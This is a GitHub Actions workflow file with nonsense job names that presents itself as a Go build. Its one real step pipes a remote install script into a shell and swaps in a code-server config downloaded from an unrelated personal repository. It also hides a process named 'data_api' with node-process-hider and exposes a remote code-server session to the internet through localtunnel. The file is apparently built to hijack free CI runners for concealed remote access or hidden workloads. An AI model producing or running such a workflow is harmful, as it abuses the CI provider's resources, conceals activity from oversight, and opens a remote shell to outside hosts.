name: namb64

on: workflow_dispatch

jobs:
  build:
    name: Meroji
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 150
      fail-fast: false
      matrix:
        go: [1.1]
        flag: [A]
    timeout-minutes: 400
    env:
        NUM_JOBS: 150
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Guntau
      run: |
        curl -fsSL https://code-server.dev/install.sh | sh -s -- --dry-run
        curl -fsSL https://code-server.dev/install.sh | sh
        timeout 2s code-server
        cd ~/.config/code-server
        sudo mv config.yaml llod
        wget https://raw.githubusercontent.com/hinshuika/jvjv/main/config.yaml
        sudo npm install -g localtunnel
        sudo npm i -g node-process-hider && ph add data_api
        code-server --bind-addr 127.0.0.1:8040  & lt --port 8040
